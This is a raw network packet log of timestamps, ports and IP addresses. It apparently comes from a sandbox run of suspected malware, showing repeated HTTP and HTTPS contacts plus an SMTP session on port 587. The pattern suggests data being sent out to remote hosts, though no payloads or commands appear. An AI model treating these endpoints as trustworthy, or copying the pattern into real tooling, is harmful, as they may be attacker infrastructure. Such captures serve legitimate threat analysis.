Jan 16, 2025 08:25:49.862534046 CET	49863	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:49.863584995 CET	49883	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:49.867501020 CET	80	49863	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:49.868022919 CET	49863	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:49.868514061 CET	80	49883	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:49.868621111 CET	49883	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:49.868696928 CET	49883	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:49.873516083 CET	80	49883	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:50.541404009 CET	80	49883	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:50.571119070 CET	49889	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:50.571156025 CET	443	49889	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:50.571453094 CET	49889	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:50.587795019 CET	49883	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:50.604985952 CET	49889	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:50.605011940 CET	443	49889	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:51.143273115 CET	443	49889	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:51.145107985 CET	49889	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:51.145126104 CET	443	49889	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:51.293263912 CET	443	49889	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:51.293431044 CET	443	49889	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:51.293504953 CET	49889	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:51.294071913 CET	49889	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:51.300426960 CET	49895	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:51.305741072 CET	80	49895	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:51.305986881 CET	49895	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:51.306107998 CET	49895	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:51.311141968 CET	80	49895	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:51.978282928 CET	80	49895	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:51.979722977 CET	49901	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:51.979752064 CET	443	49901	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:51.979836941 CET	49901	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:51.980200052 CET	49901	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:51.980215073 CET	443	49901	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:52.020713091 CET	49895	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:52.440387964 CET	443	49901	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:52.489686966 CET	49901	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:52.818438053 CET	49901	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:52.818466902 CET	443	49901	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:52.927081108 CET	443	49901	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:52.927146912 CET	443	49901	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:52.927191973 CET	49901	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:52.927613020 CET	49901	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:52.955287933 CET	49895	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:52.956295013 CET	49906	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:52.960479975 CET	80	49895	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:52.960531950 CET	49895	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:52.961433887 CET	80	49906	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:52.961507082 CET	49906	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:52.961635113 CET	49906	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:52.966523886 CET	80	49906	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:53.637414932 CET	80	49906	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:53.638545990 CET	49883	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:53.638938904 CET	49908	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:53.638967991 CET	443	49908	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:53.639349937 CET	49908	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:53.639676094 CET	49908	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:53.639688015 CET	443	49908	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:53.718703032 CET	49906	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:54.099075079 CET	443	49908	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:54.102631092 CET	49908	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:54.102654934 CET	443	49908	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:54.228004932 CET	443	49908	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:54.228081942 CET	443	49908	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:54.228151083 CET	49908	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:54.228576899 CET	49908	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:54.241849899 CET	49906	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:54.246998072 CET	80	49906	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:54.247082949 CET	49906	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:54.251095057 CET	49914	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:54.256395102 CET	80	49914	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:54.257195950 CET	49914	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:54.262969971 CET	49914	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:54.267896891 CET	80	49914	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:54.287332058 CET	49915	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:54.293303967 CET	80	49915	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:54.293386936 CET	49915	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:54.293574095 CET	49915	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:54.298407078 CET	80	49915	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:54.939654112 CET	80	49914	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:54.941114902 CET	49921	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:54.941210985 CET	443	49921	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:54.941293955 CET	49921	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:54.941854000 CET	49921	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:54.941890001 CET	443	49921	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:54.992731094 CET	80	49915	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:55.034207106 CET	49914	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:55.127948999 CET	49915	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:55.427814007 CET	443	49921	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:55.429716110 CET	49921	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:55.429811001 CET	443	49921	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:55.446940899 CET	49915	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:55.451756954 CET	80	49915	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:55.567504883 CET	443	49921	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:55.567641973 CET	443	49921	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:55.567727089 CET	49921	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:55.568195105 CET	49921	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:55.572168112 CET	49914	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:55.573532104 CET	49927	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:55.577183008 CET	80	49914	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:55.577239037 CET	49914	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:55.578326941 CET	80	49927	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:55.578475952 CET	49927	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:55.578546047 CET	49927	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:55.583369970 CET	80	49927	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:55.660913944 CET	80	49915	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:55.831084013 CET	49915	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:56.030842066 CET	49928	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:56.030875921 CET	443	49928	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:56.030973911 CET	49928	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:56.043355942 CET	49928	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:56.043368101 CET	443	49928	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:56.410900116 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:25:56.415836096 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:56.415896893 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:25:56.523181915 CET	443	49928	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:56.523288012 CET	49928	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:56.524746895 CET	49928	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:56.524754047 CET	443	49928	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:56.525146961 CET	443	49928	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:56.579005003 CET	49928	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:56.623331070 CET	443	49928	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:56.686517000 CET	443	49928	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:56.686615944 CET	443	49928	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:56.686953068 CET	49928	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:56.689574957 CET	49928	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:56.712418079 CET	49915	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:56.717271090 CET	80	49915	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:56.925709009 CET	80	49915	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:56.928023100 CET	49935	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:56.928040981 CET	443	49935	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:56.928101063 CET	49935	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:56.928328991 CET	49935	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:56.928337097 CET	443	49935	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:56.971678019 CET	49915	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:57.396039009 CET	443	49935	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:57.397859097 CET	49935	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:57.397888899 CET	443	49935	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:57.527854919 CET	443	49935	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:57.528028011 CET	443	49935	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:57.528134108 CET	49935	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:57.528372049 CET	49935	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:57.531039000 CET	49915	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:57.532108068 CET	49941	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:57.537226915 CET	80	49915	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:57.537288904 CET	49915	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:57.538080931 CET	80	49941	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:57.538156033 CET	49941	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:57.538264990 CET	49941	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:57.544517994 CET	80	49941	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:57.995141983 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:57.995311022 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:25:58.000070095 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:58.210769892 CET	80	49941	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:58.211894989 CET	49947	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:58.211925983 CET	443	49947	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:58.211990118 CET	49947	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:58.212269068 CET	49947	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:58.212280989 CET	443	49947	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:58.252356052 CET	80	49927	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:58.252943039 CET	49941	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:58.253582001 CET	49948	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:58.253679037 CET	443	49948	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:58.253770113 CET	49948	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:58.254003048 CET	49948	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:58.254040003 CET	443	49948	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:58.292009115 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:58.292169094 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:25:58.296988964 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:58.299803972 CET	49927	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:58.570207119 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:58.570580959 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:25:58.575356007 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:58.701127052 CET	443	49947	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:58.702490091 CET	49947	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:58.702512980 CET	443	49947	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:58.724365950 CET	443	49948	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:58.725857019 CET	49948	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:58.725944996 CET	443	49948	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:58.850248098 CET	443	49947	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:58.850496054 CET	443	49947	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:58.850563049 CET	49947	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:58.850986958 CET	49947	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:58.854896069 CET	49954	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:58.859703064 CET	80	49954	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:58.859772921 CET	49954	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:58.859932899 CET	49954	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:58.864653111 CET	80	49954	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:58.868810892 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:58.868824005 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:58.868889093 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:25:58.871439934 CET	443	49948	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:58.871512890 CET	443	49948	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:58.871779919 CET	49948	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:58.871977091 CET	49948	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:58.875206947 CET	49927	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:58.876390934 CET	49955	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:58.880199909 CET	80	49927	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:58.880269051 CET	49927	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:58.881227016 CET	80	49955	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:58.881294012 CET	49955	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:58.881367922 CET	49955	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:58.884040117 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:25:58.886225939 CET	80	49955	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:58.889378071 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:59.143009901 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:59.147224903 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:25:59.151983976 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:59.422697067 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:59.425190926 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:25:59.429986954 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:59.550626040 CET	80	49954	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:59.551748037 CET	49961	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:59.551790953 CET	443	49961	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:59.551908016 CET	49961	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:59.552187920 CET	49961	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:59.552201033 CET	443	49961	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:59.575124979 CET	80	49955	132.226.247.73	192.168.2.5
Jan 16, 2025 08:25:59.576097012 CET	49962	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:59.576131105 CET	443	49962	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:59.576334953 CET	49962	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:59.576524973 CET	49962	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:25:59.576539040 CET	443	49962	104.21.80.1	192.168.2.5
Jan 16, 2025 08:25:59.592012882 CET	49954	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:59.627932072 CET	49955	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:25:59.684792995 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:59.685117006 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:25:59.689919949 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:59.947706938 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:25:59.947940111 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:25:59.952706099 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:00.011408091 CET	443	49961	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:00.018765926 CET	49961	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:00.018785000 CET	443	49961	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:00.029000044 CET	443	49962	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:00.034890890 CET	49962	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:00.034904003 CET	443	49962	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:00.135817051 CET	443	49961	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:00.135960102 CET	443	49961	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:00.136100054 CET	49961	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:00.136308908 CET	49961	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:00.139264107 CET	49954	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:00.140213013 CET	49968	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:00.144265890 CET	80	49954	132.226.247.73	192.168.2.5
Jan 16, 2025 08:26:00.144328117 CET	49954	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:00.145071983 CET	80	49968	132.226.247.73	192.168.2.5
Jan 16, 2025 08:26:00.145143032 CET	49968	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:00.145201921 CET	49968	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:00.149936914 CET	80	49968	132.226.247.73	192.168.2.5
Jan 16, 2025 08:26:00.172890902 CET	443	49962	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:00.172964096 CET	443	49962	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:00.173141003 CET	49962	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:00.173326015 CET	49962	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:00.175776958 CET	49955	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:00.176578999 CET	49969	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:00.180747032 CET	80	49955	132.226.247.73	192.168.2.5
Jan 16, 2025 08:26:00.180825949 CET	49955	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:00.181404114 CET	80	49969	132.226.247.73	192.168.2.5
Jan 16, 2025 08:26:00.182020903 CET	49969	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:00.182109118 CET	49969	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:00.186871052 CET	80	49969	132.226.247.73	192.168.2.5
Jan 16, 2025 08:26:00.207089901 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:00.207427979 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:26:00.212292910 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:00.469624996 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:00.469911098 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:26:00.474744081 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:00.729480028 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:00.733335018 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:26:00.733397007 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:26:00.733422995 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:26:00.733433962 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:26:00.738101006 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:00.738148928 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:00.738289118 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:00.738301992 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:00.871831894 CET	80	49969	132.226.247.73	192.168.2.5
Jan 16, 2025 08:26:00.873131990 CET	49974	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:00.873152018 CET	443	49974	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:00.873361111 CET	49974	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:00.873481989 CET	49974	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:00.873493910 CET	443	49974	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:00.924806118 CET	49969	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:01.173794031 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:01.221684933 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:26:01.332917929 CET	443	49974	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:01.339519024 CET	49974	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:01.339541912 CET	443	49974	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:01.466366053 CET	443	49974	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:01.466525078 CET	443	49974	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:01.466671944 CET	49974	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:01.466888905 CET	49974	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:01.502032042 CET	49969	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:01.502723932 CET	49976	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:26:01.502758980 CET	443	49976	149.154.167.220	192.168.2.5
Jan 16, 2025 08:26:01.502826929 CET	49976	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:26:01.503163099 CET	49976	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:26:01.503173113 CET	443	49976	149.154.167.220	192.168.2.5
Jan 16, 2025 08:26:01.507790089 CET	80	49969	132.226.247.73	192.168.2.5
Jan 16, 2025 08:26:01.510135889 CET	49969	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:01.846009016 CET	80	49968	132.226.247.73	192.168.2.5
Jan 16, 2025 08:26:01.847445965 CET	49982	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:01.847497940 CET	443	49982	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:01.847569942 CET	49982	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:01.847793102 CET	49982	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:01.847810984 CET	443	49982	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:01.893627882 CET	49968	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:02.134052038 CET	443	49976	149.154.167.220	192.168.2.5
Jan 16, 2025 08:26:02.134147882 CET	49976	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:26:02.135538101 CET	49976	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:26:02.135544062 CET	443	49976	149.154.167.220	192.168.2.5
Jan 16, 2025 08:26:02.135971069 CET	443	49976	149.154.167.220	192.168.2.5
Jan 16, 2025 08:26:02.137391090 CET	49976	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:26:02.179336071 CET	443	49976	149.154.167.220	192.168.2.5
Jan 16, 2025 08:26:02.306405067 CET	443	49982	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:02.307723045 CET	49982	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:02.307755947 CET	443	49982	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:02.408056021 CET	443	49976	149.154.167.220	192.168.2.5
Jan 16, 2025 08:26:02.408200979 CET	443	49976	149.154.167.220	192.168.2.5
Jan 16, 2025 08:26:02.410281897 CET	49976	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:26:02.410505056 CET	49976	443	192.168.2.5	149.154.167.220
Jan 16, 2025 08:26:02.453016996 CET	443	49982	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:02.453078985 CET	443	49982	104.21.80.1	192.168.2.5
Jan 16, 2025 08:26:02.453207016 CET	49982	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:02.453685999 CET	49982	443	192.168.2.5	104.21.80.1
Jan 16, 2025 08:26:02.456572056 CET	49968	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:02.457478046 CET	49988	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:02.461517096 CET	80	49968	132.226.247.73	192.168.2.5
Jan 16, 2025 08:26:02.461584091 CET	49968	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:02.462294102 CET	80	49988	132.226.247.73	192.168.2.5
Jan 16, 2025 08:26:02.462358952 CET	49988	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:02.462423086 CET	49988	80	192.168.2.5	132.226.247.73
Jan 16, 2025 08:26:02.467164993 CET	80	49988	132.226.247.73	192.168.2.5
Jan 16, 2025 08:26:02.692842960 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:26:02.697693110 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:02.952248096 CET	587	49934	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:02.952712059 CET	49934	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:26:02.953506947 CET	49989	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:26:02.958312988 CET	587	49989	46.151.208.21	192.168.2.5
Jan 16, 2025 08:26:02.958383083 CET	49989	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:26:03.134465933 CET	80	49988	132.226.247.73	192.168.2.5
